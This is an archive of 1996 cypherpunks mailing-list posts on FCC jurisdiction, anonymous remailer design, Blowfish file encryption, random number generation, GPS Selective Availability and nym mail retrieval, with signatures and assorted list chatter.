Sat, 21 Sep 1996 22:08:03 -0500 >Reply-To: telecomreg at relay.doit.wisc.edu >Originator: telecomreg at relay.doit.wisc.edu >Sender: telecomreg at relay.doit.wisc.edu >Precedence: bulk >From: "Michael D. Sullivan" >To: Multiple recipients of list >Subject: Re: Basis of FCC Jurisdiction (Republican rant) >X-Comment: Requests (UNSUBSCRIBE/HELP) to: listserver at relay.doit.wisc.edu >MIME-Version: 1.0 > >Steve Schear wrote: > > >I've been wondering lately about the jurisdictional limits of the FCC > >vis-a-vis the Article(s) of the Constitution from which they derive their > >authority. My understanding is that the FCC is empowered under the Fed's > >interstate commerce clauses. If so, how valid is their jurisdiction over > >low power and/or millimeter wave transmissions. It seems a case can be > >made that such transmissions represent little or no possibility of > >interstate transmission. > >To which Bob Jacobson replied: > > >The FCC derives its authority by Congressional mandate, so the question is > >rightly posed as "Does Congress have rights to regulate local radio trans- > >missions?" Congress abrocated to itself the right to regulate all radio > >transmissions, on the grounds that any transmission might interfere with > >the transmissions of interstate broadcasters. Generally, this right has > >been upheld by the courts, although states have successfully challenged > >the absolute power of the FCC with regard to certain aspects of non-radio > >transmissions -- for example, telephone calls -- that do not cross state > >boundaries and even some that do. To my knowledge, no form of electronic > >transmission is invulnerable to some type of regulation, whether federal > >or state (including municipal regulation by cities and counties, creatures > >of the states). Of course, there are loopholes, as the Internet has amply > >demonstrated. > >In further response, John Levin added: > > >This discussion is incorrect by omission. The reason that states have > >authority over intrastate telephone service is because Congress says they > >do. The Telecommunications Acts carve out areas of state and federal > >jurisdiction. The FCC, like any other agency, takes an expansive view of > >their authority and courts occasionally rein in such excursions after > >looking at their enabling statutes. The technical doctrine is 'federal > >preemption', and unless Congress expressly preempts the states, or the > >preemption is necessary to effectuate a national policy authorized by > >federal legislation, the states retain control of state activities. As to > >what constitutes 'interstate commerce' for the purposes of the U.S. > >Constitution, there are hundreds, if not thousands of court decisions on > >that topic. During most of this century, usually even a very slight > >impact on interstate commerce has been found to be sufficient for Congress > >to legislate. Those of you who plan on using 'states rights' as a basis > >for disobeying Federal laws or regulations should consult an attorney and > >get your affairs in order before you act. > >Although nothing in the Communications Act of 1934 or it predecessor Radio >Acts states so explictly, it is implicit that the Interstate Commerce Clause >is the basis for the statute and for FCC radio licensing jurisdiction. That >was undoubtedly one of the bases for earlier legislative and Commerce >Department regulation of radio, along with providing for the national >defense. Under the Commerce Clause and the Necessary and Proper Clause, >Congress can assert jurisdiction over virtually anything affecting >interstate commerce. This clearly underlies Section 301 of the >Communications Act, which asserts federal jurisdiction and control over all >interstate radio transmissions and requires FCC licensing for the same. > >The Communications Act does not assert jurisdiction over, or require FCC >licenses for, radio transmissions between two points in a single state (not >including D.C.). In fact, this doesn't remove virtually anything from >federal jurisdiction or licensing as a matter of law, because radio >transmissions don't stop at any particular point, they merely attenuate as >they continue to propagate onward ad infinitum. As a technical matter, a >milliwatt-level millimeter-wave radio transmission from one end of a >steel-encased underground chamber to a receiver at the other end propagates >to points thousands of miles away, albeit at an undetectible level (i.e., >waaaaay below the noise floor), and it therefore could be viewed as an >interstate radio transmission. Practically, however, such transmissions >stop at the steel shielding. The FCC, therefore, will be unable to document >that there was an interstate radio transmission and would likely be unable >to shut you down. > >The FCC has adopted rules that permit unlicensed operation under common >circumstances when there is unlikely to be any interstate effects. Part 15 >sets forth power levels and other transmission parameters for certain >frequency bands that do not require licensing. Although the jurisdictional >basis for Part 15 has never been expressly stated, the FCC views such >transmissions as not, in any practical sense, likely to interfere with >licensed transmissions, and the unlicense use of spectrum is conditioned on >not interfering. > >One could argue that other low-power or physically confined radio >transmissions are also unlikely to cross state lines as a practical matter, >or to interfere with licensed transmissions, and are therefore beyond the >FCC's jurisdiction. The FCC has not conceded its jurisdiction in such >cases, however. There is currently litigation ongoing regarding a >California (Berkeley, perhaps?) low-power FM station that did not obtain a >license. It doesn't interfere, and it can't be received out-of-state. Can >the FCC shut it down? Yet to be decided. > >Steve Schear also wrote: > > >Another question has to do with spectrum ownership. Prior to the '34 Act > >who owned the spectrum. Was any compensation made for the taking? > >To which Bob Jacobsen replied: > > >As to ownership of the spectrum, the spectrum still is owned by the people > >of the United States, held in public trust. So-called "sales" of spectrum > >are actually licenses to use various frequencies under different rules. > >Presumably Congress has the right to sell this "property" in the same way > >that it sells forests on public lands, but so far it has not done so. On > >the other hand, the federal government has exacted remarkable fees for > >certain licenses: PCS operators have already put up over $17 billion in > >fees for licenses auctioned by the FCC! > >Actually, spectrum isn't "owned" by anyone, including the people of the >United States. One can't own a physical dimension such as frequency, any >more than distances, speeds, or colors. The federal government has asserted >*control* over the *use* of spectrum, however, just as it and the states >assert control over the use of particular speeds in particular locations >(e.g., 55 or 65 mph on freeways). As Bob said, the right to use spectrum, >within specifically defined geographic, frequency, power, and time limits, >is conferred by licenses awarded by the FCC. These licenses, for a >specified term, are sometimes given away to the first person who asks for >them, sometimes awarded by hearing or lottery, or, more recently, sometimes >awarded on the basis of the highest bid. The FCC isn't selling spectrum per >se, but a license for the exclusive right to use particular spectrum under >the defined terms of the license. This is very different from selling >public land, but is somewhat like selling the right to harvest the trees (or >mine the coal, or drill and pump the oil) from a piece of federal land for a >certain number of years. > > >---------------------------------------------------------------------- >Michael D. Sullivan, Bethesda, Maryland, USA >mds at access.digex.net / avogadro at well.com / 74160.1134 at compuserve.com >---------------------------------------------------------------------- > PGP Fingerprint: FE 90 1A 95 9D EA 8D 61 81 2E CC A9 A4 4A FB A9 --------------------------------------------------------------------- Snoop Daty Data | Internet: azur at netcom.com Grinder | Voice: 1-702-655-2877 Sacred Cow Meat Co. | Fax: 1-702-658-2673 7075 W. Gowan Road, #2148 | Las Vegas, NV 89129 | --------------------------------------------------------------------- Just say NO to prescription DRUGS. "Of all tyrannies, a tyranny sincerely exercised for the good of its victims may be the most oppressive." -- C.S. Lewis "Surveillence is ultimately just another form of media, and thus, potential entertainment." -- G. Beato From declan at eff.org Sat Sep 28 11:51:15 1996 From: declan at eff.org (Declan McCullagh) Date: Sun, 29 Sep 1996 02:51:15 +0800 Subject: quotation In-Reply-To: Message-ID: That came from a report Kenneth filed for the fight-censorship list from Paris earlier this week after his dinner conversation with U.S. OECD delegates: http://www.eff.org/~declan/global/g7-oecd/oecd_paris_cukier_092696.article I don't forward everything to cypherpunks. If you want to read the stuff, subscribe to the list: http://www.eff.org/~declan/fight-censorship/ -Declan On Sat, 28 Sep 1996, Ulf Moeller wrote: > Found in a sig file: > > "The people involved in the crypto debate are all intelligent, honorable and > pro-escrow, but they never possess more than two of these qualities at once." > -- Kenneth Neil Cukier (100736.3602 at compuserve.com) > // declan at eff.org // I do not represent the EFF // declan at well.com // From markm at voicenet.com Sat Sep 28 12:06:41 1996 From: markm at voicenet.com (Mark M.) Date: Sun, 29 Sep 1996 03:06:41 +0800 Subject: Project Electric Potatoes [CRYPTO] In-Reply-To: <960928093843_295524911@emout08.mail.aol.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 28 Sep 1996 Scottauge at aol.com wrote: > Already we are seeing problems for speech on the internet (see radikal > postings - though they are a bit fruity IMHO.) And it sounds like the law in > one country is going to be very interested in arresting people in another. > > Hence, perhaps we need a crypto system (including human procedures and fail > safes) for community discussions. > > Crypto is very much one to one right now, but can we implement a crypto for > wide distribution to a very defined set of people? > > This should be useful in commerce too... like CC of mail to others, etc. > > Problem Definition Time: > > Who will be responsible for allowing a member into the community? (And all > the other trust issues...) This is one of the main problems with a system like this. It would be very hard to prove that a pseudonym isn't a fed. Rather than restricting communication to just a few people, everyone should be able to participate and use a nym. This would make arrests very difficult. I think it is inevitable that the communications would eventually be leaked to a TLA. You might want to look for information on PGPdomo. This does just about everything you've described. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMk1VRizIPc7jvyFpAQH5ZAf/bf1kW7gsKjukaRASrppEdqgJGkWYzwXt P+Rh2xfkR1pk9FW/7DZL3Q/OuRfYF/cdQw1qpic9ufaIkpaoA7enmoPk8V/rzGxy opTCfrobFtA6pEGAkxcz6DP+CRB18rBo9lklkneXrs1rfR1Pd4aK7XcOCAdze865 J527kjhKGkgKLonvjDw7hdkJk5z1ov9qetByJzB8lUbKXmrMD5nm5lA/in5uqkW3 ak4cYR3yFl4/IVG9Ng0Ht3RY4gw1U9lzFKnYNlCs40gZPGIkr9kCiMR7u/HQ9jpi T2C+JUr84Ab/C2Uj3xr0MMX7sU1o3g5sP63gEmp2AY5sz8+bWyE8zA== =X6zq -----END PGP SIGNATURE----- From markm at voicenet.com Sat Sep 28 12:10:22 1996 From: markm at voicenet.com (Mark M.) Date: Sun, 29 Sep 1996 03:10:22 +0800 Subject: Making Remailers Widespread In-Reply-To: <199609280358.UAA02589@dfw-ix4.ix.netcom.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 27 Sep 1996, Bill Stewart wrote: > I've been thinking about how to make one-way remailers a > widespread commodity, rather than the novelty item they are today. > Doing two-way remailers would be better, but that's still a hard problem, > and I don't want to widely deploy shoddy two-way-remailers. > > Suppose we add form-based remailer support to a popular SSL-equipped > HTTP server, such as Apache-SSL, by putting remailer.pl and a > remailer form in the default setup, which would deploy hundreds of remailers > with minimal effort. What would we have to do to make it work well, > rather than turn into a public relations disaster and spam explosion? In addition to all the points made below, security would be extremely important for a remailer cgi script. If security holes were found in the source code, it might discourage many web admins from running the script even after the hole is patched. > > - The remailer script would have to add disclaimers at the beginning > and/or end of the message reminding readers that the message is > anonymous, and to contact the remailer cabal rather than the postmaster. > > - Blocking becomes a big problem - it's annoying enough now, > when there are a small number of remailers with hard-working operators; > we'd need some sort of automated blocking support to make it > usable by relatively non-involved operators > > - A centralized block list (e.g. http://www.remailer.net/block.txt) > which all of the form-based remailers could load and reference would > allow non-picky operators not to have to handle it themselves > > - Implementing the blocking list as a web form for people who > want to be blocked would make it relatively painless to use; > remailer-operators wouldn't have to transcribe email from the > remailer-operators list to use it, which helps with other problems. Since maintaining a block list is probably one of the most time-consuming tasks involved with operating a remailer, it would be a Good Thing to add an option to the remailer cgi program to operate as a "middleman" remailer. This would only require the remailer operator to add or remove entries from a list of allowed destinations. The operator wouldn't have to deal with disclaimers and would only receive complaints from other operators if the remailer is malfunctioning in some way. [...] > Technical question: > - How do we initiate an http or https PUT from a script? > I assume there's probably some perl add-in for posting http/https? > Is there a command-line-shell interface that can fetch URLs? I don't know if any perl modules or *.ph files exist that implement http/https. Http should be pretty easy, but https would require SSL code. I think there are perl modules that contain crypto functions, so https could use the functions provided in the module. Netcat can be used pretty easily to fetch URLs (e.g. echo "GET /foobar.html HTTP/1.0" | nc www.webserver.com 80). This will print out the HTML files and cooresponding MIME headers on stdout. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMk1apCzIPc7jvyFpAQGHbwgAvWQgQnZXov/u6ts2eVjbOfG0ogNpkhZa GuZrX+hNoIJNTO+2aqeKIolnz+5rSz+80FH6iOhr96OftilFr4o7Qug2cS4zHijQ 9JBtvbZ6TljDRnogsc6LInbVz/doHr7vbQmCyFslAdo7uAd/cTK1C9X0cHKewepc eLa1dv7qJWupcIIYy+KvhDAfGPjuhf7Q5fNYlfQlfKzdNk38ZkPEUyqLCypgQ8Hk CH+wm5ne5EGvztnR7qgyt6XZk6CU3UQBQCfbLICIQMYdUzy/f7hCBmDjVxXXMNc7 iIAQyLG0c0BJNs4wNmFyREmnL7vbmMqwLAKvP9jk0XgRpXzY9K0cUA== =uLlT -----END PGP SIGNATURE----- From markm at voicenet.com Sat Sep 28 12:26:41 1996 From: markm at voicenet.com (Mark M.) Date: Sun, 29 Sep 1996 03:26:41 +0800 Subject: WARNING: This Message Actually Contains a Question Reguarding Crypto! In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sat, 28 Sep 1996, J�ri Kaljundi wrote: > A program called F-Secure Desktop for Windows 3.x and Windows 95 is using > Blowfish with 256-bit keys. It is meant for encrypting the files on your > hard disk and it works nicely together with Windows File Manager or > Windows95 shell. I would say it is one of the best strong and easy to use > HD encryption programs (only that it costs $$). > > It is manufactured by Datafellows, who is also distributing F-Secure SSH. > You can download the demo version at http://www.datafellows.com/f-secure/ > > Why they are using it: may be because it is fast on Intel Pentium and > Pentium Pro processors, as discussed in Applied Cryptography? Blowfish is unpatented and the source code doesn't have any restrictions. If they used something like IDEA, they would have to pay for a license. I don't know if Blowfish is faster than 3DES, but if it isn't, then I have no idea why they would use Blowfish. Mark - -- PGP encrypted mail prefered. Key fingerprint = d61734f2800486ae6f79bfeb70f95348 http://www.voicenet.com/~markm/ -----BEGIN PGP SIGNATURE----- Version: 2.6.3 Charset: noconv iQEVAwUBMk1WRSzIPc7jvyFpAQGM0Af9ExuNlTHG7YE9fwoZzpvx3WhF7nE1bLml IXuNKHbXSSzaYYFi7kzz6qj/OYEI0c8J3CDL0MtF1q/z0b9xlFo5j+H5nnKtw5z+ tuM0HZcgrNepfXRMhEzEj0CI0XD1kk50kuUQmIWrt2pKkjY1hszdonWzyJx/2z6l e8aH7ClbmgSTmTt2L/p3ts5UFWMzFH6fLwZkyhPVtu5r3gtizMZkqyF/jdGzBlqj qiKupkJuIXe8QUrLOahWkNuHsllv4NsZVrgmP9XaMK4JdoyuITdfN73pc1v3JlZj Ep+gmJkoVShLxgW45BQ6Axp+zXCFvA5XCQqZrLVPxCYU9Tan98YWMw== =lumy -----END PGP SIGNATURE----- From tcmay at got.net Sat Sep 28 12:30:43 1996 From: tcmay at got.net (Timothy C. May) Date: Sun, 29 Sep 1996 03:30:43 +0800 Subject: Mousepad RNG's? In-Reply-To: <199609281551.IAA03203@dns2.noc.best.net> Message-ID: At 8:13 PM -0700 9/27/96, James A. Donald wrote: >Some time ago, at a cypherpunks conference, people were making >all sorts of ridiculous proposals for being really, really, >really, sure that you had real entropy, and a prominent >cypherpunk, possibly Tim May, said, "This is ridiculous: >Nobody ever broke good crypto through weakness in the >source of truly random numbers". Sometime after that >Netscape was broken through weakness in the source of >truly random numbers. This somewhat misrepresents what I said, back at that Cypherpunks meeting in 1993-4. The Netscape "random number generator" that was the basis of the Goldberg and Wagner attack was not even remotely a _physical_ random number generator, as it relied on various Unix clock readings and not on any physical sources of entropy (such as mouse tracks, Johnson noise, radioactivity, etc.). It was a classic case of living in a state of sin. --Tim May We got computers, we're tapping phone lines, I know that that ain't allowed. ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1,257,787-1 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From jimbell at pacifier.com Sat Sep 28 12:53:56 1996 From: jimbell at pacifier.com (jim bell) Date: Sun, 29 Sep 1996 03:53:56 +0800 Subject: crypto anarchy vs AP Message-ID: <199609281729.KAA05451@mail.pacifier.com> At 02:06 PM 9/26/96 -0500, snow wrote: >Mr. Beck said: >> Been reading the AP thread, and thought I'd donate some of my views. > >> the Internet. You'd just cause the government to panic, and this >> would have negative effects, it would take ages for them to calm down, >> and the laws they'd pass in the mean time would mean a near certainty >> of mandatory GAK as a condition to switching the Internet back on. >> (Before someone takes me to task for the impossibility of switching >> the Internet off, it all depends on the level of government panic. >> More specifically perhaps they would disconnect key backbones, and >> ISPs briefly while they rushed into effect a few presidential decrees >> outlawing non GAKed crypto, anonymous ecash, remailers, PGP, DC-nets, >> etc.) > > This would be cutting their own throats. There is SO much commercial >and government traffic going across "The Net" that many businesses would >scream bloody murder, and the government would have MASSIVE trouble with >it's agenda. Yes, that "they'll cut off the Internet!" talk doesn't seem to be very practical. Society very quickly develops dependency on inventions. Try to take away their computers and they'd scream; take away their telephone and it'd be worse! Give Internet another couple of years and 50% of big business would be severely impacted should it be cut off. Wait five years and the world would practically stop rotating without Internet. On a related issue, GPS (global-positioning system) contains a de-accurizing mis-feature called S/A, which adds a little error to the location as detected by a receiver. Ostensibly, it was added so that this could be turned on in wartime, to deny the enemy the ability to make 10-meter fixes. Turns out that it was kept on all the time, probably because if it WASN'T it would become politically impossible to de-accurize the system even in wartime. Jim Bell jimbell at pacifier.com From zachb at netcom.com Sat Sep 28 13:48:46 1996 From: zachb at netcom.com (Z.B.) Date: Sun, 29 Sep 1996 04:48:46 +0800 Subject: [CRYPTO] (was: sig/noise ratio) In-Reply-To: <324CBFD1.6BCB@popd.ix.netcom.com> Message-ID: On Fri, 27 Sep 1996, Patricia Gibbons wrote: > > In the interest of those who wish a significant increase in the > > signal/noise ratio I make a proposal. Significant crypto related > > posts could be prefaced with [CRYPTO] on the subject line on a > > strictly volunteer basis, that way those desiring a more topical > > list could have one simply by setting the appropriate filter. > > > > Items crypto related but missing the [CRYPTO] header could be > > reposted by well meaning souls. > > > > Other appropriate headers could of course be used. > > > > Brian > Sounds like a good idea, but what do you define as "significant crypto"? Also, what's to stop the anonymous idiot and several other well-known list.idiots from doing the same? Zach Babayco zachb at netcom.com <-------finger for PGP public key http://www.geocities.com/SiliconValley/Park/4127 ----- If you need to know how to set up a mail filter or defend against emailbombs, send me a message with the words "get helpfile" (without the " marks) in the SUBJECT: header. I have several useful FAQ's and documents available. From ponder at freenet.tlh.fl.us Sat Sep 28 14:29:58 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Sun, 29 Sep 1996 05:29:58 +0800 Subject: [CRYPTO], or hash, anyway Message-ID: I need a copy of the appendix to the SHA FIPS pub (180-1?) that has the three test texts and corresponding SHA hashes, so that I can test an SHA implementation I'm working with. I have tried the NIST site, and can't seem to get through. If anybody has this test deal, or knows where it is out there on the net somewhere, please let me know. Thanks in advance. (My problem is I keep getting different hashes between an MS-DOS version I'm running and one running on a Linux box, when I ftp the same files back and forth. @#$%. I thought maybe I was having problems with some kind of Line-feed vs. Carriage Return/Line-feed conversion deal, but it also generates different hashes on binary files. So I thought I would test the Linux and the DOS one against the specs in the FIPS, and see which one is hosed up.) -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ to unsubscribe, send to majordomo at toad.com a message that reads: unsubscribe cypherpunks in the message body, not the SUBJECT: line. -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ From cvhd at indyweb.net Sat Sep 28 14:50:00 1996 From: cvhd at indyweb.net (cvhd at indyweb.net) Date: Sun, 29 Sep 1996 05:50:00 +0800 Subject: WARNING: This Message Actually Contains a Question Reguarding Crypto! Message-ID: <3.0b26.32.19960928144259.006a5f48@indyweb.net> >A program called F-Secure Desktop for Windows 3.x and Windows 95 is using >Blowfish with 256-bit keys. It is meant for encrypting the files on your >hard disk and it works nicely together with Windows File Manager or >Windows95 shell. I would say it is one of the best strong and easy to use >HD encryption programs (only that it costs $$). Yes, but how "safe" is a 256-bit key with blowfish? Would it withstand the efforts of big bro' ? From ponder at freenet.tlh.fl.us Sat Sep 28 14:55:08 1996 From: ponder at freenet.tlh.fl.us (P. J. Ponder) Date: Sun, 29 Sep 1996 05:55:08 +0800 Subject: [NOISE, was CRYPTO], or hash, anyway Message-ID: Please disregard earlier message about finding copy of the SHA document: FIPS PUB 180-1, I found it at: http://bilbo.isu.edu/security/isl/fip180-1.html Thanks, anyway. From stewarts at ix.netcom.com Sat Sep 28 15:22:18 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 06:22:18 +0800 Subject: EFF Distributes Terrorist Information On Internet - Wiretaps Needed!! :-) Message-ID: <199609282010.NAA27339@dfw-ix3.ix.netcom.com> The recent electronic newsletter of that suspicious organization calling itself the EFF contains terrorist material: > Received: (from daemon at localhost) by eff.org (8.7.5/8.6.6) id QAA17422 for > effector-comc-exploder; Fri, 27 Sep 1996 16:57:26 -0700 (PDT) > ^^^^^^^^^^^^^^^^^^^^^^ Comic exploders? How totally un-American. They must be stopped! Because a MIME is a terrible thing to waste.... # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From dlv at bwalk.dm.com Sat Sep 28 15:29:32 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 06:29:32 +0800 Subject: crypto anarchy vs AP In-Reply-To: <199609281729.KAA05451@mail.pacifier.com> Message-ID: jim bell writes: > On a related issue, GPS (global-positioning system) contains a de-accurizing > mis-feature called S/A, which adds a little error to the location as > detected by a receiver. Ostensibly, it was added so that this could be > turned on in wartime, to deny the enemy the ability to make 10-meter fixes. > Turns out that it was kept on all the time, probably because if it WASN'T it > would become politically impossible to de-accurize the system even in wartime Two funny rumors: 1. Supposedly the DoD users of GPS have access to the accurate positioning information at all times. (Not sure how this works - the accurate data is encrypted?) During the Iraq war in '93 they didn't have enough equipment to take advantage of this, so they turned off the S/A and gave everyone (including the military users) accurate GPS on commercially available GPS eq. Then they turned it back on. 2. The DoD is doing a study right now on how to make GPS useless to the enemy at wartime. I think figuring out a way to turn off A/S and getting accurage GPS on commercial equipment at all times would make a nifty Cypherpunks project - if it really involves breaking some encryption. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dlv at bwalk.dm.com Sat Sep 28 15:41:03 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 06:41:03 +0800 Subject: Looking for Qualified Individual/Firm to Contract for Cryptanalysis In-Reply-To: <199609281833.EAA04360@suburbia.net> Message-ID: Julian Assange writes: > > I am looking for one or more people (or firms) who are qualified to perform > > world class cryptanalysis work. Please send mail to me at joswald1 at msn.com > > call in the U.S. at +1 408.479.7874 > > > > Jack Oswald > > > > Find your father's little black book under the couch? Well, I dialed the number out of curisotity (it's in San Diego). The answering machine says "This is Jack Oswald with R.P.K." Sounds gay. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From mech at eff.org Sat Sep 28 16:42:11 1996 From: mech at eff.org (Stanton McCandlish) Date: Sun, 29 Sep 1996 07:42:11 +0800 Subject: EFF Distributes Terrorist Information On Internet - Wiretaps In-Reply-To: <199609282010.NAA27339@dfw-ix3.ix.netcom.com> Message-ID: <199609282106.OAA25388@eff.org> > The recent electronic newsletter of that suspicious organization > calling itself the EFF contains terrorist material: > > Received: (from daemon at localhost) by eff.org (8.7.5/8.6.6) id QAA17422 for > > effector-comc-exploder; Fri, 27 Sep 1996 16:57:26 -0700 (PDT) > > ^^^^^^^^^^^^^^^^^^^^^^ > > Comic exploders? How totally un-American. They must be stopped! > > Because a MIME is a terrible thing to waste.... Heh. If anyone's genuinely curious, the EFFector list is big enough that we have it split by domain, and then by letter. effector-comc-exploder is a script that "explodes" EFFector to all the *@[*.]c*.com addresses on the list. :) -- Stanton McCandlish

mech at eff.org

Electronic Frontier Foundation

Program Director From nobody at cypherpunks.ca Sat Sep 28 16:43:12 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sun, 29 Sep 1996 07:43:12 +0800 Subject: [CRYPTO] Labeling messages Message-ID: <199609282105.OAA10791@abraham.cs.berkeley.edu> Fart fart fart fart TWA 800 fart fart fart. Tim May fart fart AP fart Taxes fart fart fart. Fart. From gcg at pb.net Sat Sep 28 17:50:13 1996 From: gcg at pb.net (Geoffrey C. Grabow) Date: Sun, 29 Sep 1996 08:50:13 +0800 Subject: What about making re-mailers automatically chain? Message-ID: <3.0b15.32.19960928181545.006a6214@mail.pb.net> Would it be a good idea to have a re-mailer "randomly" decide whether to send the mail to the destination or to another re-mailer. If all re-mailers performed this way, not even the sender would know the path. The chain could be short sometimes and long others. Granted, there is a possibility that every mailer decides to chain instead of sending the message to the recip, but some clever counter tag could keep the number of links to a certain maximum. The "randomness" of this would aid in traffic analysis, and of course each mailer that decides to chain the mail would encrypt under the next mailer's pub key. Any thoughts? G.C.G. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ | Geoffrey C. Grabow | Great people talk about ideas. | | Oyster Bay, New York | Average people talk about things. | | gcg at pb.net | Small people talk about people. | |----------------------------------------------------------------------| | PGP 2.6.2 public key available at http://www.pb.net/~wizard | | and on a plethora of key servers around the world. | | Key ID = 0E818EC1 | | Fingerprint = A6 7B 67 D7 E9 96 37 7D E7 16 BD 5E F4 5A B2 E4 | |----------------------------------------------------------------------| | That which does not kill us, makes us stranger. - Trevor Goodchild | ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From stewarts at ix.netcom.com Sat Sep 28 18:00:12 1996 From: stewarts at ix.netcom.com (Bill Stewart) Date: Sun, 29 Sep 1996 09:00:12 +0800 Subject: Public Schools [NOISE] Message-ID: <199609282255.PAA05134@dfw-ix3.ix.netcom.com> attila: >= .> a very unusual situation --but I live in rural southern >= .> utah where the regional middle school of 1200 can support 4 >= .> bands, the top 2 being very impressive, and provide full AP >= .> classes, and ACT Tim: >= .Wow! Utah is teaching AP? Is Jim Bell being brought in as a >= .Special Lecturer? attilla > come on, Tim... you are not that old. AP has three meanings > (at least): > 1. Associated Press (news gathering) > 2. Advanced Placement (as in college credit for HS classes) > 3. not widely known: Jim Bell's Assassination Political Hey, if a high school can teach kids to read the Associated Press critically and think about what it's saying and means, they're doing a really fine job! For that matter, if they can teach kids to just read the news at all, they're accomplishing something. I was surprised by the idea of teaching Advanced Placement classes in a middle school - in the reasonably high-quality public school I went to, most of the AP classes were taken by 12th graders and a few by 11th-graders, though this was partly because that's when we started getting slack in our schedules after taking the regular courses. # Thanks; Bill # Bill Stewart, +1-415-442-2215 stewarts at ix.netcom.com # # You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto From backdraft at earthlink.net Sat Sep 28 18:13:24 1996 From: backdraft at earthlink.net (Back Draft) Date: Sun, 29 Sep 1996 09:13:24 +0800 Subject: No Subject Message-ID: desubscribe From dlv at bwalk.dm.com Sat Sep 28 18:16:38 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sun, 29 Sep 1996 09:16:38 +0800 Subject: Igor Chudov's cypherpunks felony admission turned over to the appropriate authorities Message-ID: Yo C'punks, check this out: >Path: ...!newsfeed.internetmci.com!news.sgi.com!enews.sgi.com!news.mathworks.com!news.sprintlink.net!news-peer.sprintlink.net!arclight.uoregon.edu!netnews.worldnet.att.net!uunet!news-in2.uu.net!news1.gte.net!usenet >From: netscum at gte.net >Newsgroups: news.admin.net-abuse.misc,soc.culture.russian >Subject: Chudov's published felony admission turned over to Commerce >Date: Fri, 27 Sep 1996 03:16:06 GMT >Organization: GTE Intelligent Network Services, GTE INS >Sender: netscum at gte.net >Distribution: Worldwide Net Scum >Message-ID: <324b43fa.476946222 at news.gte.net> >Reply-To: yourself at netscum.org > >Igor Chudov's published admission of his willful and purposeful violation >of ITAR laws (a criminal felony offense according the United States Code) >has been turned over to the appropriate investigators at the Department of >Commerce in Washington, D.C., who expressed interest in this incident, >particularly because of the additional contributing factor of Chudov's visa >status being under active investigation by the Department of Justice, >Immigration and Naturalization Service. Chudov's very bad example serves >notice on the many netscum reading this article that "crime does not pay." Also check out NetScum's home page at http://home1.gte.net/netscum. From mixmaster at remail.obscura.com Sat Sep 28 19:17:02 1996 From: mixmaster at remail.obscura.com (Mixmaster) Date: Sun, 29 Sep 1996 10:17:02 +0800 Subject: [NOT NOISE] Jena Remailer Message-ID: <199609282310.QAA19716@sirius.infonex.com> wmono at Direct.CA wrote to All: w> My appologies in advance to the list for this noise. Dear Anonymous, w> if there is another way to contact you, please let it be known so that w> this need not involve the 1500 others on the list. Noise? Are you on drugs? This is one of the relatively few _on-topic_ threads on this damned list these days! If 1500 other folks can be made to give a try to the Jenaer Remailer then this thread has served a very useful and salutary purpose. >> 4: Account is automatically established and should work >> immediately. w> As soon as the mail arrives, that is correct. If it was lost by using w> a non-operational remailer, or by sending a misformatted mail, then it w> will not. I believe this was the problem; several of the remailers were choking right when I was doing this experiment. Indeed, I had to post my reply to you here FOUR times through otherwise reliable remailers before it ever showed up. w> It may be lag, it may not be. I recommend that you create a test nym, w> with minimal anonymity (no remailers, send everything directly to w> jena) and, after waiting several hours to ensure that the key was w> added, send a mail from your nym to your own account. If you get no w> mail after several hours, something is wrong. This is mechanically a sound suggestion, but I believe that it is a primary security measure to avoid any direct contact with fresh remailer, even using a waste account. >> w> - Never request a delivery to your real Email address. >> So here's what I really want to know: When/if the new account is up >> and running, how _does_ one discreetly retrieve his mail? I don't >> see how, other than to have it sent to alt.anonymous.messages via a >> mail2news netmail address such as >> alt.anonymous.messages at news.demon.co.uk and then pick through the >> mess there until some cyphertext message responds to his right key. w> That's exactly right. We need better message pools. Actually, what w> is needed is a email message pool, because of the lag and uncertainly w> of Usenet. But that's a project for another day. >From a security standpoint, to say nothing of the netmail load, I should prefer not to use an e-mail pool, but the daunting load of spam and clueless messages in a.a.m is a nuisance, and you are surely right about the vagaries of Usenet connectivity. My first thought was to have them sent to a non-autopinging *.test ng via a well-tested parsing mail2news gate, but some autopingers ping ALL *.test traffic passing through a site. If these ping messages didn't 